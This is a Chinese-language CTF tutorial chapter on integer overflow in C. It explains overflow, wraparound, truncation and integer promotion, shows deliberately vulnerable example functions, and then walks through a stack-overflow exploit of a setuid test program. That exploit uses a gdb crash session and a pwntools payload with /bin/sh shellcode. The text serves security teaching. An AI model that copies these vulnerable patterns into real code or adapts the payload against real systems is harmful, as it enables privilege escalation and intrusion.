CTF-All-In-One/doc/3.3.2_integer_overflow.md

# 3.3.2 整数溢出

- [什么是整数溢出](#什么是整数溢出)
- [整数溢出](#整数溢出)
- [整数溢出示例](#整数溢出示例)
- [CTF 中的整数溢出](#ctf-中的整数溢出)


## 什么是整数溢出
#### 简介
在 C 语言基础的章节中，我们介绍了 C 语言整数的基础知识，下面我们详细介绍整数的安全问题。

由于整数在内存里面保存在一个固定长度的空间内，它能存储的最大值和最小值是固定的，如果我们尝试去存储一个数，而这个数又大于这个固定的最大值时，就会导致整数溢出。（x86-32 的数据模型是 ILP32，即整数（Int）、长整数（Long）和指针（Pointer）都是 32 位。）

#### 整数溢出的危害
如果一个整数用来计算一些敏感数值，如缓冲区大小或数值索引，就会产生潜在的危险。通常情况下，整数溢出并没有改写额外的内存，不会直接导致任意代码执行，但是它会导致栈溢出和堆溢出，而后两者都会导致任意代码执行。由于整数溢出出现之后，很难被立即察觉，比较难用一个有效的方法去判断是否出现或者可能出现整数溢出。


## 整数溢出
关于整数的异常情况主要有三种：
- 溢出
  - 只有有符号数才会发生溢出。有符号数最高位表示符号，在两正或两负相加时，有可能改变符号位的值，产生溢出
  - 溢出标志 `OF` 可检测有符号数的溢出
- 回绕
  - 无符号数 `0-1` 时会变成最大的数，如 1 字节的无符号数会变为 `255`，而 `255+1` 会变成最小数 `0`。
  - 进位标志 `CF` 可检测无符号数的回绕
- 截断
  - 将一个较大宽度的数存入一个宽度小的操作数中，高位发生截断

#### 有符号整数溢出
- 上溢出
```c
int i;
i = INT_MAX;  // 2 147 483 647
i++;
printf("i = %d\n", i);  // i = -2 147 483 648
```

- 下溢出
```c
i = INT_MIN;  // -2 147 483 648
i--;
printf("i = %d\n", i);  // i = 2 147 483 647
```

#### 无符号数回绕
涉及无符号数的计算永远不会溢出，因为不能用结果为无符号整数表示的结果值被该类型可以表示的最大值加 1 之和取模减（reduced modulo）。因为回绕，一个无符号整数表达式永远无法求出小于零的值。

使用下图直观地理解回绕，在轮上按顺时针方向将值递增产生的值紧挨着它：

![](../pic/1.5.1_unsigned_integer.png)

```c
unsigned int ui;
ui = UINT_MAX;  // 在 x86-32 上为 4 294 967 295
ui++;
printf("ui = %u\n", ui);  // ui = 0
ui = 0;
ui--;
printf("ui = %u\n", ui);  // 在 x86-32 上，ui = 4 294 967 295
```

#### 截断
- 加法截断：
```text
0xffffffff + 0x00000001
= 0x0000000100000000 (long long)
= 0x00000000 (long)
```
- 乘法截断：
```text
0x00123456 * 0x00654321
= 0x000007336BF94116 (long long)
= 0x6BF94116 (long)
```

#### 整型提升和宽度溢出
整型提升是指当计算表达式中包含了不同宽度的操作数时，较小宽度的操作数会被提升到和较大操作数一样的宽度，然后再进行计算。

示例：[源码](../src/Other/3.3.2_integer_overflow/width_overflow.c)
```c
#include<stdio.h>
void main() {
    int l;
    short s;
    char c;

    l = 0xabcddcba;
    s = l;
    c = l;

    printf("宽度溢出\n");
    printf("l = 0x%x (%d bits)\n", l, sizeof(l) * 8);
    printf("s = 0x%x (%d bits)\n", s, sizeof(s) * 8);
    printf("c = 0x%x (%d bits)\n", c, sizeof(c) * 8);

    printf("整型提升\n");
    printf("s + c = 0x%x (%d bits)\n", s+c, sizeof(s+c) * 8);
}
```
```text
$ ./a.out
宽度溢出
l = 0xabcddcba (32 bits)
s = 0xffffdcba (16 bits)
c = 0xffffffba (8 bits)
整型提升
s + c = 0xffffdc74 (32 bits)
```
使用 gdb 查看反汇编代码：
```text
gdb-peda$ disassemble main
Dump of assembler code for function main:
   0x0000056d <+0>:	lea    ecx,[esp+0x4]
   0x00000571 <+4>:	and    esp,0xfffffff0
   0x00000574 <+7>:	push   DWORD PTR [ecx-0x4]
   0x00000577 <+10>:	push   ebp
   0x00000578 <+11>:	mov    ebp,esp
   0x0000057a <+13>:	push   ebx
   0x0000057b <+14>:	push   ecx
   0x0000057c <+15>:	sub    esp,0x10
   0x0000057f <+18>:	call   0x470 <__x86.get_pc_thunk.bx>
   0x00000584 <+23>:	add    ebx,0x1a7c
   0x0000058a <+29>:	mov    DWORD PTR [ebp-0xc],0xabcddcba
   0x00000591 <+36>:	mov    eax,DWORD PTR [ebp-0xc]
   0x00000594 <+39>:	mov    WORD PTR [ebp-0xe],ax
   0x00000598 <+43>:	mov    eax,DWORD PTR [ebp-0xc]
   0x0000059b <+46>:	mov    BYTE PTR [ebp-0xf],al
   0x0000059e <+49>:	sub    esp,0xc
   0x000005a1 <+52>:	lea    eax,[ebx-0x1940]
   0x000005a7 <+58>:	push   eax
   0x000005a8 <+59>:	call   0x400 <puts@plt>
   0x000005ad <+64>:	add    esp,0x10
   0x000005b0 <+67>:	sub    esp,0x4
   0x000005b3 <+70>:	push   0x20
   0x000005b5 <+72>:	push   DWORD PTR [ebp-0xc]
   0x000005b8 <+75>:	lea    eax,[ebx-0x1933]
   0x000005be <+81>:	push   eax
   0x000005bf <+82>:	call   0x3f0 <printf@plt>
   0x000005c4 <+87>:	add    esp,0x10
   0x000005c7 <+90>:	movsx  eax,WORD PTR [ebp-0xe]
   0x000005cb <+94>:	sub    esp,0x4
   0x000005ce <+97>:	push   0x10
   0x000005d0 <+99>:	push   eax
   0x000005d1 <+100>:	lea    eax,[ebx-0x191f]
   0x000005d7 <+106>:	push   eax
   0x000005d8 <+107>:	call   0x3f0 <printf@plt>
   0x000005dd <+112>:	add    esp,0x10
   0x000005e0 <+115>:	movsx  eax,BYTE PTR [ebp-0xf]
   0x000005e4 <+119>:	sub    esp,0x4
   0x000005e7 <+122>:	push   0x8
   0x000005e9 <+124>:	push   eax
   0x000005ea <+125>:	lea    eax,[ebx-0x190b]
   0x000005f0 <+131>:	push   eax
   0x000005f1 <+132>:	call   0x3f0 <printf@plt>
   0x000005f6 <+137>:	add    esp,0x10
   0x000005f9 <+140>:	sub    esp,0xc
   0x000005fc <+143>:	lea    eax,[ebx-0x18f7]
   0x00000602 <+149>:	push   eax
   0x00000603 <+150>:	call   0x400 <puts@plt>
   0x00000608 <+155>:	add    esp,0x10
   0x0000060b <+158>:	movsx  edx,WORD PTR [ebp-0xe]
   0x0000060f <+162>:	movsx  eax,BYTE PTR [ebp-0xf]
   0x00000613 <+166>:	add    eax,edx
   0x00000615 <+168>:	sub    esp,0x4
   0x00000618 <+171>:	push   0x20
   0x0000061a <+173>:	push   eax
   0x0000061b <+174>:	lea    eax,[ebx-0x18ea]
   0x00000621 <+180>:	push   eax
   0x00000622 <+181>:	call   0x3f0 <printf@plt>
   0x00000627 <+186>:	add    esp,0x10
   0x0000062a <+189>:	nop
   0x0000062b <+190>:	lea    esp,[ebp-0x8]
   0x0000062e <+193>:	pop    ecx
   0x0000062f <+194>:	pop    ebx
   0x00000630 <+195>:	pop    ebp
   0x00000631 <+196>:	lea    esp,[ecx-0x4]
   0x00000634 <+199>:	ret
End of assembler dump.
```

在整数转换的过程中，有可能导致下面的错误：
- 损失值：转换为值的大小不能表示的一种类型
- 损失符号：从有符号类型转换为无符号类型，导致损失符号

#### 漏洞多发函数
我们说过整数溢出要配合上其他类型的缺陷才能有用，下面的两个函数都有一个 `size_t` 类型的参数，常常被误用而产生整数溢出，接着就可能导致缓冲区溢出漏洞。

```c
#include <string.h>

void *memcpy(void *dest, const void *src, size_t n);
```
`memcpy()` 函数将 `src` 所指向的字符串中以 `src` 地址开始的前 `n` 个字节复制到 `dest` 所指的数组中，并返回 `dest`。

```c
#include <string.h>

char *strncpy(char *dest, const char *src, size_t n);
```
`strncpy()` 函数从源 `src` 所指的内存地址的起始位置开始复制 `n` 个字节到目标 `dest` 所指的内存地址的起始位置中。

两个函数中都有一个类型为 `size_t` 的参数，它是无符号整型的 `sizeof` 运算符的结果。
```c
typedef unsigned int size_t;
```


## 整数溢出示例
现在我们已经知道了整数溢出的原理和主要形式，下面我们先看几个简单示例，然后实际操作利用一个整数溢出漏洞。

#### 示例
示例一，整数转换：
```
char buf[80];
void vulnerable() {
    int len = read_int_from_network();
    char *p = read_string_from_network();
    if (len > 80) {
        error("length too large: bad dog, no cookie for you!");
        return;
    }
    memcpy(buf, p, len);
}
```
这个例子的问题在于，如果攻击者给 `len` 赋于了一个负数，则可以绕过 `if` 语句的检测，而执行到 `memcpy()` 的时候，由于第三个参数是 `size_t` 类型，负数 `len` 会被转换为一个无符号整型，它可能是一个非常大的正数，从而复制了大量的内容到 `buf` 中，引发了缓冲区溢出。

示例二，回绕和溢出：
```c
void vulnerable() {
    size_t len;
    // int len;
    char* buf;

    len = read_int_from_network();
    buf = malloc(len + 5);
    read(fd, buf, len);
    ...
}
```
这个例子看似避开了缓冲区溢出的问题，但是如果 `len` 过大，`len+5` 有可能发生回绕。比如说，在 x86-32 上，如果 `len = 0xFFFFFFFF`，则 `len+5 = 0x00000004`，这时 `malloc()` 只分配了 4 字节的内存区域，然后在里面写入大量的数据，缓冲区溢出也就发生了。（如果将 `len` 声明为有符号 `int` 类型，`len+5` 可能发生溢出）

示例三，截断：
```
void main(int argc, char *argv[]) {
    unsigned short int total;
    total = strlen(argv[1]) + strlen(argv[2]) + 1;
    char *buf = (char *)malloc(total);
    strcpy(buf, argv[1]);
    strcat(buf, argv[2]);
    ...
}
```
这个例子接受两个字符串类型的参数并计算它们的总长度，程序分配足够的内存来存储拼接后的字符串。首先将第一个字符串参数复制到缓冲区中，然后将第二个参数连接到尾部。如果攻击者提供的两个字符串总长度无法用 `total` 表示，则会发生截断，从而导致后面的缓冲区溢出。

#### 实战
看了上面的示例，我们来真正利用一个整数溢出漏洞。[源码](../src/Other/3.3.2_integer_overflow/integer.c)
```c
#include<stdio.h>
#include<string.h>
void validate_passwd(char *passwd) {
	char passwd_buf[11];
	unsigned char passwd_len = strlen(passwd);
	if(passwd_len >= 4 && passwd_len <= 8) {
		printf("good!\n");
		strcpy(passwd_buf, passwd);
	} else {
		printf("bad!\n");
	}
}

int main(int argc, char *argv[]) {
	if(argc != 2) {
		printf("error\n");
		return 0;
	}
	validate_passwd(argv[1]);
}
```
上面的程序中 `strlen()` 返回类型是 `size_t`，却被存储在无符号字符串类型中，任意超过无符号字符串最大上限值（256 字节）的数据都会导致截断异常。当密码长度为 261 时，截断后值变为 5，成功绕过了 `if` 的判断，导致栈溢出。下面我们利用溢出漏洞来获得 shell。

编译命令：
```text
# echo 0 > /proc/sys/kernel/randomize_va_space
$ gcc -g -fno-stack-protector -z execstack vuln.c
$ sudo chown root vuln
$ sudo chgrp root vuln
$ sudo chmod +s vuln
```
使用 gdb 反汇编 `validate_passwd` 函数。
```text
gdb-peda$ disassemble validate_passwd
Dump of assembler code for function validate_passwd:
   0x0000059d <+0>:	push   ebp                            ; 压入 ebp
   0x0000059e <+1>:	mov    ebp,esp
   0x000005a0 <+3>:	push   ebx                            ; 压入 ebx
   0x000005a1 <+4>:	sub    esp,0x14
   0x000005a4 <+7>:	call   0x4a0 <__x86.get_pc_thunk.bx>
   0x000005a9 <+12>:	add    ebx,0x1a57
   0x000005af <+18>:	sub    esp,0xc
   0x000005b2 <+21>:	push   DWORD PTR [ebp+0x8]
   0x000005b5 <+24>:	call   0x430 <strlen@plt>
   0x000005ba <+29>:	add    esp,0x10
   0x000005bd <+32>:	mov    BYTE PTR [ebp-0x9],al         ; 将 len 存入 [ebp-0x9]
   0x000005c0 <+35>:	cmp    BYTE PTR [ebp-0x9],0x3
   0x000005c4 <+39>:	jbe    0x5f2 <validate_passwd+85>
   0x000005c6 <+41>:	cmp    BYTE PTR [ebp-0x9],0x8
   0x000005ca <+45>:	ja     0x5f2 <validate_passwd+85>
   0x000005cc <+47>:	sub    esp,0xc
   0x000005cf <+50>:	lea    eax,[ebx-0x1910]
   0x000005d5 <+56>:	push   eax
   0x000005d6 <+57>:	call   0x420 <puts@plt>
   0x000005db <+62>:	add    esp,0x10
   0x000005de <+65>:	sub    esp,0x8
   0x000005e1 <+68>:	push   DWORD PTR [ebp+0x8]
   0x000005e4 <+71>:	lea    eax,[ebp-0x14]                ; 取 passwd_buf 地址
   0x000005e7 <+74>:	push   eax                           ; 压入 passwd_buf
   0x000005e8 <+75>:	call   0x410 <strcpy@plt>
   0x000005ed <+80>:	add    esp,0x10
   0x000005f0 <+83>:	jmp    0x604 <validate_passwd+103>
   0x000005f2 <+85>:	sub    esp,0xc
   0x000005f5 <+88>:	lea    eax,[ebx-0x190a]
   0x000005fb <+94>:	push   eax
   0x000005fc <+95>:	call   0x420 <puts@plt>
   0x00000601 <+100>:	add    esp,0x10
   0x00000604 <+103>:	nop
   0x00000605 <+104>:	mov    ebx,DWORD PTR [ebp-0x4]
   0x00000608 <+107>:	leave
   0x00000609 <+108>:	ret
End of assembler dump.
```
通过阅读反汇编代码，我们知道缓冲区 `passwd_buf` 位于 `ebp=0x14` 的位置（`0x000005e4 <+71>:	lea    eax,[ebp-0x14]`），而返回地址在 `ebp+4` 的位置，所以返回地址相对于缓冲区 `0x18` 的位置。我们测试一下：
```text
gdb-peda$ r `python2 -c 'print "A"*24 + "B"*4 + "C"*233'`
Starting program: /home/a.out `python2 -c 'print "A"*24 + "B"*4 + "C"*233'`
good!

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xffffd0f4 ('A' <repeats 24 times>, "BBBB", 'C' <repeats 172 times>...)
EBX: 0x41414141 ('AAAA')
ECX: 0xffffd490 --> 0x534c0043 ('C')
EDX: 0xffffd1f8 --> 0xffff0043 --> 0x0
ESI: 0xf7f95000 --> 0x1bbd90
EDI: 0x0
EBP: 0x41414141 ('AAAA')
ESP: 0xffffd110 ('C' <repeats 200 times>...)
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x42424242
[------------------------------------stack-------------------------------------]
0000| 0xffffd110 ('C' <repeats 200 times>...)
0004| 0xffffd114 ('C' <repeats 200 times>...)
0008| 0xffffd118 ('C' <repeats 200 times>...)
0012| 0xffffd11c ('C' <repeats 200 times>...)
0016| 0xffffd120 ('C' <repeats 200 times>...)
0020| 0xffffd124 ('C' <repeats 200 times>...)
0024| 0xffffd128 ('C' <repeats 200 times>...)
0028| 0xffffd12c ('C' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x42424242 in ?? ()
```
可以看到 `EIP` 被 `BBBB` 覆盖，相当于我们获得了返回地址的控制权。构建下面的 payload：
```python
from pwn import *

ret_addr = 0xffffd118     # ebp = 0xffffd108
shellcode = shellcraft.i386.sh()

payload = "A" * 24
payload += p32(ret_addr)
payload += "\x90" * 20
payload += asm(shellcode)
payload += "C" * 169      # 24 + 4 + 20 + 44 + 169 = 261
```


## CTF 中的整数溢出